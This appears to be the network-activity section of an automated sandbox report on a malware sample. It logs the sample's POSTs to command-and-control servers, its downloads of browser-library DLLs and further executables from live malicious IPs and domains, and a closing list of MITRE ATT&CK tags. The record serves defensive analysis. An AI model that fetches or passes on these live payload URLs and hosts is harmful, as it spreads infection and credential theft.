Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BFCGDAAKFHIDBFIDBKFH
Host: 185.172.128.145
Content-Length: 359
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 17 Mar 2024 02:19:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
GET

http://185.172.128.145/15f649199f40275b/freebl3.dll

upk.0.exe

Remote address:

185.172.128.145:80

Request

GET /15f649199f40275b/freebl3.dll HTTP/1.1
Host: 185.172.128.145
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 17 Mar 2024 02:19:12 GMT
Content-Type: application/x-msdos-program
Content-Length: 685392
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "a7550-5e7e950876500"
Accept-Ranges: bytes
GET

http://185.172.128.145/15f649199f40275b/mozglue.dll

upk.0.exe

Remote address:

185.172.128.145:80

Request

GET /15f649199f40275b/mozglue.dll HTTP/1.1
Host: 185.172.128.145
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 17 Mar 2024 02:19:13 GMT
Content-Type: application/x-msdos-program
Content-Length: 608080
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "94750-5e7e950876500"
Accept-Ranges: bytes
GET

http://185.172.128.145/15f649199f40275b/msvcp140.dll

upk.0.exe

Remote address:

185.172.128.145:80

Request

GET /15f649199f40275b/msvcp140.dll HTTP/1.1
Host: 185.172.128.145
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 17 Mar 2024 02:19:15 GMT
Content-Type: application/x-msdos-program
Content-Length: 450024
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "6dde8-5e7e950876500"
Accept-Ranges: bytes
GET

http://185.172.128.145/15f649199f40275b/nss3.dll

upk.0.exe

Remote address:

185.172.128.145:80

Request

GET /15f649199f40275b/nss3.dll HTTP/1.1
Host: 185.172.128.145
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 17 Mar 2024 02:19:17 GMT
Content-Type: application/x-msdos-program
Content-Length: 2046288
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "1f3950-5e7e950876500"
Accept-Ranges: bytes
GET

http://185.172.128.145/15f649199f40275b/softokn3.dll

upk.0.exe

Remote address:

185.172.128.145:80

Request

GET /15f649199f40275b/softokn3.dll HTTP/1.1
Host: 185.172.128.145
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 17 Mar 2024 02:19:25 GMT
Content-Type: application/x-msdos-program
Content-Length: 257872
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "3ef50-5e7e950876500"
Accept-Ranges: bytes
GET

http://185.172.128.145/15f649199f40275b/vcruntime140.dll

upk.0.exe

Remote address:

185.172.128.145:80

Request

GET /15f649199f40275b/vcruntime140.dll HTTP/1.1
Host: 185.172.128.145
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 17 Mar 2024 02:19:26 GMT
Content-Type: application/x-msdos-program
Content-Length: 80880
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "13bf0-5e7e950876500"
Accept-Ranges: bytes
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

upk.0.exe

Remote address:

185.172.128.145:80

Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EGDGCGCFHIEHIDGDBAAE
Host: 185.172.128.145
Content-Length: 827
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 17 Mar 2024 02:19:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

upk.0.exe

Remote address:

185.172.128.145:80

Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CGIEBAFHJJDBGCAKJJKF
Host: 185.172.128.145
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 17 Mar 2024 02:19:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 2408
Connection: keep-alive
Vary: Accept-Encoding
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

upk.0.exe

Remote address:

185.172.128.145:80

Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JDAFIEHIEGDHIDGDGHDH
Host: 185.172.128.145
Content-Length: 265
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 17 Mar 2024 02:19:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 2052
Connection: keep-alive
Vary: Accept-Encoding
POST

http://185.172.128.145/3cd2b41cbde8fc9c.php

upk.0.exe

Remote address:

185.172.128.145:80

Request

POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DAKJDHIEBFIIDGDGDBAE
Host: 185.172.128.145
Content-Length: 15735
Connection: Keep-Alive
Cache-Control: no-cache
DNS

145.128.172.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

145.128.172.185.in-addr.arpa

IN PTR

Response
DNS

145.128.172.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

145.128.172.185.in-addr.arpa

IN PTR

Response
DNS

178.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

178.178.17.96.in-addr.arpa

IN PTR

Response

178.178.17.96.in-addr.arpa

IN PTR

a96-17-178-178deploystaticakamaitechnologiescom
DNS

178.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

178.178.17.96.in-addr.arpa

IN PTR
DNS

nidoe.org

Remote address:

8.8.8.8:53

Request

nidoe.org

IN A

Response

nidoe.org

IN A

201.110.237.22

nidoe.org

IN A

46.100.50.5

nidoe.org

IN A

183.100.39.16

nidoe.org

IN A

211.181.24.132

nidoe.org

IN A

190.135.89.202

nidoe.org

IN A

211.181.24.133

nidoe.org

IN A

186.145.236.18

nidoe.org

IN A

187.134.63.219

nidoe.org

IN A

187.211.22.82

nidoe.org

IN A

95.86.30.3
DNS

nidoe.org

Remote address:

8.8.8.8:53

Request

nidoe.org

IN A

Response

nidoe.org

IN A

187.211.22.82

nidoe.org

IN A

95.86.30.3

nidoe.org

IN A

201.110.237.22

nidoe.org

IN A

46.100.50.5

nidoe.org

IN A

183.100.39.16

nidoe.org

IN A

211.181.24.132

nidoe.org

IN A

190.135.89.202

nidoe.org

IN A

211.181.24.133

nidoe.org

IN A

186.145.236.18

nidoe.org

IN A

187.134.63.219
DNS

nidoe.org

Remote address:

8.8.8.8:53

Request

nidoe.org

IN A

Response

nidoe.org

IN A

190.135.89.202

nidoe.org

IN A

211.181.24.133

nidoe.org

IN A

186.145.236.18

nidoe.org

IN A

187.134.63.219

nidoe.org

IN A

187.211.22.82

nidoe.org

IN A

95.86.30.3

nidoe.org

IN A

201.110.237.22

nidoe.org

IN A

46.100.50.5

nidoe.org

IN A

183.100.39.16

nidoe.org

IN A

211.181.24.132
DNS

nidoe.org

Remote address:

8.8.8.8:53

Request

nidoe.org

IN A
POST

http://nidoe.org/tmp/index.php

Remote address:

201.110.237.22:80

Request

POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://imgtydjinacdowy.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 209
Host: nidoe.org

Response

HTTP/1.0 404 Not Found

Date: Sun, 17 Mar 2024 02:19:26 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
X-Powered-By: PHP/7.4.15
Content-Length: 7
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://nidoe.org/tmp/index.php

Remote address:

201.110.237.22:80

Request

POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://voyximaeplhny.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 286
Host: nidoe.org

Response

HTTP/1.0 404 Not Found

Date: Sun, 17 Mar 2024 02:19:27 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
X-Powered-By: PHP/7.4.15
Content-Length: 340
Connection: close
Content-Type: text/html; charset=utf-8
DNS

22.237.110.201.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.237.110.201.in-addr.arpa

IN PTR

Response

22.237.110.201.in-addr.arpa

IN PTR

dsl-201-110-237-22-dynprod-infinitumcommx
DNS

22.237.110.201.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.237.110.201.in-addr.arpa

IN PTR

Response

22.237.110.201.in-addr.arpa

IN PTR

dsl-201-110-237-22-dynprod-infinitumcommx
POST

http://nidoe.org/tmp/index.php

Remote address:

201.110.237.22:80

Request

POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qbdlydlwqeylfloq.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 325
Host: nidoe.org
DNS

Remote address:

201.110.237.22:80

Response

HTTP/1.0 404 Not Found

Date: Sun, 17 Mar 2024 02:19:37 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
X-Powered-By: PHP/7.4.15
Content-Length: 340
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://nidoe.org/tmp/index.php

Remote address:

201.110.237.22:80

Request

POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://mnjbnhodcyhhg.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 288
Host: nidoe.org

Response

HTTP/1.0 404 Not Found

Date: Sun, 17 Mar 2024 02:19:38 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
X-Powered-By: PHP/7.4.15
Content-Length: 340
Connection: close
Content-Type: text/html; charset=utf-8
DNS

1531ef0c-7f64-4da6-b3dc-58d174bd01a3.uuid.alldatadump.org

Remote address:

8.8.8.8:53

Request

1531ef0c-7f64-4da6-b3dc-58d174bd01a3.uuid.alldatadump.org

IN TXT

Response
DNS

1531ef0c-7f64-4da6-b3dc-58d174bd01a3.uuid.alldatadump.org

Remote address:

8.8.8.8:53

Request

1531ef0c-7f64-4da6-b3dc-58d174bd01a3.uuid.alldatadump.org

IN TXT

Response
POST

http://nidoe.org/tmp/index.php

Remote address:

201.110.237.22:80

Request

POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://kceijhdjenljypuy.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 266
Host: nidoe.org
POST

http://nidoe.org/tmp/index.php

Remote address:

201.110.237.22:80

Request

POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://kcjcjmuiwfj.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 206
Host: nidoe.org

Response

HTTP/1.0 404 Not Found

Date: Sun, 17 Mar 2024 02:19:43 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
X-Powered-By: PHP/7.4.15
Content-Length: 340
Connection: close
Content-Type: text/html; charset=utf-8
DNS

resergvearyinitiani.shop

Remote address:

8.8.8.8:53

Request

resergvearyinitiani.shop

IN A

Response

resergvearyinitiani.shop

IN A

172.67.217.100

resergvearyinitiani.shop

IN A

104.21.94.2
DNS

resergvearyinitiani.shop

Remote address:

8.8.8.8:53

Request

resergvearyinitiani.shop

IN A

Response

resergvearyinitiani.shop

IN A

172.67.217.100

resergvearyinitiani.shop

IN A

104.21.94.2
DNS

100.217.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

100.217.67.172.in-addr.arpa

IN PTR

Response
DNS

100.217.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

100.217.67.172.in-addr.arpa

IN PTR

Response
DNS

wisemassiveharmonious.shop

MsBuild.exe

Remote address:

8.8.8.8:53

Request

wisemassiveharmonious.shop

IN A

Response
DNS

wisemassiveharmonious.shop

MsBuild.exe

Remote address:

8.8.8.8:53

Request

wisemassiveharmonious.shop

IN A

91.215.85.120:80

http://selebration17io.io/index.php

http

388.1kB
18.7MB
7867
13425

HTTP Request

POST http://selebration17io.io/index.php

HTTP Response

404

HTTP Request

POST http://selebration17io.io/index.php

HTTP Response

404

HTTP Request

POST http://selebration17io.io/index.php

HTTP Response

404

HTTP Request

POST http://selebration17io.io/index.php

HTTP Response

404

HTTP Request

POST http://selebration17io.io/index.php

HTTP Response

404

HTTP Request

POST http://selebration17io.io/index.php

HTTP Response

404

HTTP Request

POST http://selebration17io.io/index.php

HTTP Response

404

HTTP Request

POST http://selebration17io.io/index.php

HTTP Response

404

HTTP Request

POST http://selebration17io.io/index.php

HTTP Response

404

HTTP Request

POST http://selebration17io.io/index.php

HTTP Response

404

HTTP Request

POST http://selebration17io.io/index.php

HTTP Response

404

HTTP Request

POST http://selebration17io.io/index.php

HTTP Response

404

HTTP Request

POST http://selebration17io.io/index.php

HTTP Response

404

HTTP Request

POST http://selebration17io.io/index.php

HTTP Response

404

HTTP Request

POST http://selebration17io.io/index.php

HTTP Response

404

HTTP Request

POST http://selebration17io.io/index.php

HTTP Request

POST http://selebration17io.io/index.php
204.79.197.200:443

https://tse1.mm.bing.net/th?id=OADD2.10239317301617_1V543CFQPAISNVZHR&pid=21.2&w=1080&h=1920&c=4

tls, http2

72.8kB
1.9MB
1417
1413

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418548_1UEU8RPM3S7H7G0D8&pid=21.2&w=1080&h=1920&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301208_1A8N3XLBQPT0ST5XU&pid=21.2&w=1920&h=1080&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239339388050_13LHMV8LNZUBG68MF&pid=21.2&w=1920&h=1080&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239339388051_1DI9F3V3Y6K7A0KMB&pid=21.2&w=1080&h=1920&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418547_1N5DXBL93QHFGMSRD&pid=21.2&w=1920&h=1080&c=4

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301617_1V543CFQPAISNVZHR&pid=21.2&w=1080&h=1920&c=4

HTTP Response

200
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.3kB
9.5kB
17
15
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.3kB
9.5kB
17
15
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.3kB
9.5kB
17
15
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.3kB
9.5kB
17
15
185.172.128.19:80

http://185.172.128.19/288c47bbc1871b439df19ff4df68f00076.exe

http

152.6kB
6.8MB
3076
5045

HTTP Request

GET http://185.172.128.19/288c47bbc1871b439df19ff4df68f00076.exe

HTTP Response

200
211.171.233.126:80

http://trmpc.com/check/index.php

http

4.2kB
221.5kB
88
166

HTTP Request

GET http://trmpc.com/check/index.php

HTTP Response

200
172.67.206.194:443

https://herdbescuitinjurywu.shop/api

tls, http

MsBuild.exe

1.6kB
6.7kB
13
10

HTTP Request

POST https://herdbescuitinjurywu.shop/api

HTTP Response

200
172.67.185.152:443

https://colorfulequalugliess.shop/api

tls, http

MsBuild.exe

2.0kB
13.2kB
19
18

HTTP Request

POST https://colorfulequalugliess.shop/api

HTTP Response

200

HTTP Request

POST https://colorfulequalugliess.shop/api

HTTP Response

200
172.67.221.14:80

http://slim.dofuly.info/data/pdf/may.exe

http

32.0kB
2.0MB
626
1448

HTTP Request

GET http://slim.dofuly.info/data/pdf/may.exe

HTTP Response

200
185.172.128.90:80

http://185.172.128.90/cpa/ping.php?substr=four&s=ab&sub=0

http

InstallSetup_four.exe

389 B
280 B
4
3

HTTP Request

GET http://185.172.128.90/cpa/ping.php?substr=four&s=ab&sub=0

HTTP Response

200
185.172.128.187:80

http://185.172.128.187/syncUpd.exe

http

InstallSetup_four.exe

4.7kB
254.3kB
99
192

HTTP Request

GET http://185.172.128.187/syncUpd.exe

HTTP Response

200
185.172.128.187:80

http://185.172.128.187/ping.php?substr=four

http

InstallSetup_four.exe

375 B
279 B
4
3

HTTP Request

GET http://185.172.128.187/ping.php?substr=four

HTTP Response

200
185.172.128.126:80

http://185.172.128.126/BroomSetup.exe

http

InstallSetup_four.exe

46.3kB
1.9MB
877
1411

HTTP Request

GET http://185.172.128.126/BroomSetup.exe

HTTP Response

200
185.172.128.145:80

http://185.172.128.145/3cd2b41cbde8fc9c.php

http

upk.0.exe

213.3kB
5.4MB
4097
4087

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php

HTTP Response

200

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php

HTTP Response

200

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php

HTTP Response

200

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php

HTTP Response

200

HTTP Request

GET http://185.172.128.145/15f649199f40275b/sqlite3.dll

HTTP Response

200

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php

HTTP Response

200

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php

HTTP Response

200

HTTP Request

GET http://185.172.128.145/15f649199f40275b/freebl3.dll

HTTP Response

200

HTTP Request

GET http://185.172.128.145/15f649199f40275b/mozglue.dll

HTTP Response

200

HTTP Request

GET http://185.172.128.145/15f649199f40275b/msvcp140.dll

HTTP Response

200

HTTP Request

GET http://185.172.128.145/15f649199f40275b/nss3.dll

HTTP Response

200

HTTP Request

GET http://185.172.128.145/15f649199f40275b/softokn3.dll

HTTP Response

200

HTTP Request

GET http://185.172.128.145/15f649199f40275b/vcruntime140.dll

HTTP Response

200

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php

HTTP Response

200

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php

HTTP Response

200

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php

HTTP Response

200

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php
201.110.237.22:80

http://nidoe.org/tmp/index.php

http

761 B
464 B
6
5

HTTP Request

POST http://nidoe.org/tmp/index.php

HTTP Response

404
201.110.237.22:80

http://nidoe.org/tmp/index.php

http

836 B
799 B
6
5

HTTP Request

POST http://nidoe.org/tmp/index.php

HTTP Response

404
201.110.237.22:80

http://nidoe.org/tmp/index.php

http

786 B
132 B
4
3

HTTP Request

POST http://nidoe.org/tmp/index.php
201.110.237.22:80

nidoe.org

40 B
1
201.110.237.22:80

nidoe.org

52 B
1
201.110.237.22:80

nidoe.org

http

92 B
707 B
2
3

HTTP Response

404
201.110.237.22:80

http://nidoe.org/tmp/index.php

http

838 B
839 B
6
6

HTTP Request

POST http://nidoe.org/tmp/index.php

HTTP Response

404
201.110.237.22:80

http://nidoe.org/tmp/index.php

http

727 B
132 B
4
3

HTTP Request

POST http://nidoe.org/tmp/index.php
185.172.128.187:80

46 B
40 B
1
1
201.110.237.22:80

http://nidoe.org/tmp/index.php

http

904 B
799 B
9
5

HTTP Request

POST http://nidoe.org/tmp/index.php

HTTP Response

404
172.67.217.100:443

resergvearyinitiani.shop

tls

1.1kB
6.3kB
10
10
172.67.185.152:443

colorfulequalugliess.shop

tls

1.8kB
11.1kB
15
15

8.8.8.8:53

72.32.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

72.32.126.40.in-addr.arpa
8.8.8.8:53

240.221.184.93.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

240.221.184.93.in-addr.arpa
8.8.8.8:53

217.106.137.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

217.106.137.52.in-addr.arpa
8.8.8.8:53

241.154.82.20.in-addr.arpa

dns

144 B
158 B
2
1

DNS Request

241.154.82.20.in-addr.arpa

DNS Request

241.154.82.20.in-addr.arpa
8.8.8.8:53

41.110.16.96.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

41.110.16.96.in-addr.arpa
8.8.8.8:53

103.169.127.40.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

103.169.127.40.in-addr.arpa
8.8.8.8:53

206.23.85.13.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

206.23.85.13.in-addr.arpa
8.8.8.8:53

13.86.106.20.in-addr.arpa

dns

142 B
157 B
2
1

DNS Request

13.86.106.20.in-addr.arpa

DNS Request

13.86.106.20.in-addr.arpa
8.8.8.8:53

104.241.123.92.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

104.241.123.92.in-addr.arpa
8.8.8.8:53

selebration17io.io

dns

64 B
80 B
1
1

DNS Request

selebration17io.io

DNS Response

91.215.85.120
8.8.8.8:53

120.85.215.91.in-addr.arpa

dns

72 B
132 B
1
1

DNS Request

120.85.215.91.in-addr.arpa
8.8.8.8:53

119.110.54.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

119.110.54.20.in-addr.arpa
8.8.8.8:53

26.35.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

26.35.223.20.in-addr.arpa
8.8.8.8:53

18.134.221.88.in-addr.arpa

dns

288 B
137 B
4
1

DNS Request

18.134.221.88.in-addr.arpa

DNS Request

18.134.221.88.in-addr.arpa

DNS Request

18.134.221.88.in-addr.arpa

DNS Request

18.134.221.88.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
173 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

174.178.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

174.178.17.96.in-addr.arpa
8.8.8.8:53

211.135.221.88.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

211.135.221.88.in-addr.arpa
8.8.8.8:53

209.178.17.96.in-addr.arpa

dns

144 B
274 B
2
2

DNS Request

209.178.17.96.in-addr.arpa

DNS Request

209.178.17.96.in-addr.arpa
8.8.8.8:53

19.128.172.185.in-addr.arpa

dns

219 B
73 B
3
1

DNS Request

19.128.172.185.in-addr.arpa

DNS Request

19.128.172.185.in-addr.arpa

DNS Request

19.128.172.185.in-addr.arpa
8.8.8.8:53

trmpc.com

dns

110 B
430 B
2
2

DNS Request

trmpc.com

DNS Request

trmpc.com

DNS Response

211.171.233.126

196.188.169.138

175.120.254.9

190.220.21.28

181.26.199.14

186.147.159.149

109.98.58.98

109.175.29.39

190.13.174.90

187.134.63.219

DNS Response

181.26.199.14

186.147.159.149

109.98.58.98

109.175.29.39

190.13.174.90

187.134.63.219

211.171.233.126

196.188.169.138

175.120.254.9

190.220.21.28
8.8.8.8:53

herdbescuitinjurywu.shop

dns

MsBuild.exe

70 B
102 B
1
1

DNS Request

herdbescuitinjurywu.shop

DNS Response

172.67.206.194

104.21.69.91
8.8.8.8:53

194.206.67.172.in-addr.arpa

dns

146 B
270 B
2
2

DNS Request

194.206.67.172.in-addr.arpa

DNS Request

194.206.67.172.in-addr.arpa
8.8.8.8:53

126.233.171.211.in-addr.arpa

dns

148 B
286 B
2
2

DNS Request

126.233.171.211.in-addr.arpa

DNS Request

126.233.171.211.in-addr.arpa
8.8.8.8:53

wisemassiveharmonious.shop

dns

MsBuild.exe

144 B
258 B
2
2

DNS Request

wisemassiveharmonious.shop

DNS Request

wisemassiveharmonious.shop
8.8.8.8:53

colorfulequalugliess.shop

dns

MsBuild.exe

142 B
206 B
2
2

DNS Request

colorfulequalugliess.shop

DNS Response

172.67.185.152

104.21.19.68

DNS Request

colorfulequalugliess.shop

DNS Response

172.67.185.152

104.21.19.68
8.8.8.8:53

152.185.67.172.in-addr.arpa

dns

146 B
270 B
2
2

DNS Request

152.185.67.172.in-addr.arpa

DNS Request

152.185.67.172.in-addr.arpa
8.8.8.8:53

slim.dofuly.info

dns

124 B
188 B
2
2

DNS Request

slim.dofuly.info

DNS Response

172.67.221.14

104.21.62.68

DNS Request

slim.dofuly.info

DNS Response

172.67.221.14

104.21.62.68
8.8.8.8:53

90.128.172.185.in-addr.arpa

dns

146 B
146 B
2
2

DNS Request

90.128.172.185.in-addr.arpa

DNS Request

90.128.172.185.in-addr.arpa
8.8.8.8:53

22.236.111.52.in-addr.arpa

dns

144 B
316 B
2
2

DNS Request

22.236.111.52.in-addr.arpa

DNS Request

22.236.111.52.in-addr.arpa
8.8.8.8:53

187.128.172.185.in-addr.arpa

dns

148 B
148 B
2
2

DNS Request

187.128.172.185.in-addr.arpa

DNS Request

187.128.172.185.in-addr.arpa
8.8.8.8:53

126.128.172.185.in-addr.arpa

dns

148 B
148 B
2
2

DNS Request

126.128.172.185.in-addr.arpa

DNS Request

126.128.172.185.in-addr.arpa
8.8.8.8:53

145.128.172.185.in-addr.arpa

dns

148 B
148 B
2
2

DNS Request

145.128.172.185.in-addr.arpa

DNS Request

145.128.172.185.in-addr.arpa
8.8.8.8:53

178.178.17.96.in-addr.arpa

dns

144 B
137 B
2
1

DNS Request

178.178.17.96.in-addr.arpa

DNS Request

178.178.17.96.in-addr.arpa
8.8.8.8:53
8.8.8.8:53

nidoe.org

dns

220 B
645 B
4
3

DNS Request

nidoe.org

DNS Request

nidoe.org

DNS Request

nidoe.org

DNS Request

nidoe.org

DNS Response

201.110.237.22

46.100.50.5

183.100.39.16

211.181.24.132

190.135.89.202

211.181.24.133

186.145.236.18

187.134.63.219

187.211.22.82

95.86.30.3

DNS Response

187.211.22.82

95.86.30.3

201.110.237.22

46.100.50.5

183.100.39.16

211.181.24.132

190.135.89.202

211.181.24.133

186.145.236.18

187.134.63.219

DNS Response

190.135.89.202

211.181.24.133

186.145.236.18

187.134.63.219

187.211.22.82

95.86.30.3

201.110.237.22

46.100.50.5

183.100.39.16

211.181.24.132
8.8.8.8:53

22.237.110.201.in-addr.arpa

dns

146 B
262 B
2
2

DNS Request

22.237.110.201.in-addr.arpa

DNS Request

22.237.110.201.in-addr.arpa
8.8.8.8:53

1531ef0c-7f64-4da6-b3dc-58d174bd01a3.uuid.alldatadump.org

dns

206 B
328 B
2
2

DNS Request

1531ef0c-7f64-4da6-b3dc-58d174bd01a3.uuid.alldatadump.org

DNS Request

1531ef0c-7f64-4da6-b3dc-58d174bd01a3.uuid.alldatadump.org
8.8.8.8:53

resergvearyinitiani.shop

dns

140 B
204 B
2
2

DNS Request

resergvearyinitiani.shop

DNS Request

resergvearyinitiani.shop

DNS Response

172.67.217.100

104.21.94.2

DNS Response

172.67.217.100

104.21.94.2
8.8.8.8:53

100.217.67.172.in-addr.arpa

dns

146 B
270 B
2
2

DNS Request

100.217.67.172.in-addr.arpa

DNS Request

100.217.67.172.in-addr.arpa
8.8.8.8:53

wisemassiveharmonious.shop

dns

MsBuild.exe

144 B
129 B
2
1

DNS Request

wisemassiveharmonious.shop

DNS Request

wisemassiveharmonious.shop

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery